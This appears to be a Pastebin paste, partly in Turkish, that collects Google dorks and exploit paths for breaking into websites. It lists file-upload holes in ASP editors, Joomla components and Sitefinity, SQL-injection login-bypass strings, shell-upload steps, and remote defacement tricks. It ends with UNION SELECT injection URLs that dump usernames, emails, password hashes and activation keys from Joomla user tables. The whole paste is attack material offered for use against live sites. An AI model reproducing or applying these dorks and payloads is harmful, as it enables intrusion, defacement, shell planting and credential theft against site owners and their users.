Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- inurl:”/admin/saveannounce_upload.asp”
- inurl:”admin/eWebEditor/Upload.asp”
- inurl:”UploadFile/upload.asp”
- WEBWİZ ACİGİ (RTE UPLOAD ACIGI )
- inurl:rte/my_documents/my_files/
- inurl:/my_documents/my_files/
- exloit: /rte/RTE_popup_file_atch.asp
- Editör açığı
- inurl:editor/assetmanager/ (arama kodu geliştirilebilir)
- EXPLOİT : /Editor/assetmanager/assetmanager.asp
- Joomla upload açıgı
- inurl index.php?option=com_expose
- Exploit: administrator/components/com_expose/uploadimg.php
- Uploadin gittigi yer : /components/com_expose/expose/img/
- Sitefinity: Login upload açıgı
- inurl:”Sitefinity: Login”
- exploit: Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx
- Auto Login For Joomla Dork .:old:.
- inurl:/administrator/index.php?autologin=1
- ---
- BYPASS ADMIN ACCESS
- Dorks:
- Code:
- inurl:admin.asp
- inurl:adminlogin.aspx
- inurl:admin/index.php
- inurl:administrator.php
- inurl:administrator.asp
- inurl:login.asp
- inurl:login.aspx
- inurl:login.php
- inurl:admin/index.php
- inurl:adminlogin.aspx
- Code:
- ‘ or 1=1 –
- 1'or’1'=’1
- admin’–
- ” or 0=0 –
- or 0=0 –
- ‘ or 0=0 #
- ” or 0=0 #
- or 0=0 #
- ‘ or ‘x’='x
- ” or “x”=”x
- ‘) or (‘x’='x
- ‘ or 1=1–
- ” or 1=1–
- or 1=1–
- ‘ or a=a–
- ” or “a”=”a
- ‘) or (‘a’='a
- “) or (“a”=”a
- hi” or “a”=”a
- hi” or 1=1 –
- hi’ or 1=1 –
- hi’ or ‘a’='a
- hi’) or (‘a’='a
- ----
- Joomla Component com_smartformer shell upload
- Google Dork inurl:"index.php?option=com_smartformer"
- & upload shell.php
- Your shell :
- http://localhost/components/com_smartformer/files/yourshell.php
- ---
- Ministry Web Designing Multiple Vulnerabilities
- exploit bypass to login:
- user: '=' 'or'
- pass: '=' 'or'
- Vunlerable Sections:
- inurl:/downloadcounter/admin/login.php
- inurl:/mediaprogram/admin/index.php
- inurl:/churchprogram/login.php
- ----
- (Deface)Exploit (Remote Deface ) Joomla Component
- Dork : inurl:index.php?option=com_fabrik
- Exploit : /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- ---
- [Priv8] Joomla Com_content exploit - defacing joomla websites
- Dork :
- inurl:index.php?option=com_content & "/mambots/editors/fckeditor"
- Vulnerable File :
- mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
- You can exploit this vulnerable joomla component and deface joomla wesbites and you can also sometimes upload your shell
- ----
- exploit joomla "com_artforms" reset password
- Dork : inurl:"option com_artforms"
- /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--
- /index.php?option=com_user&view=reset
- /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement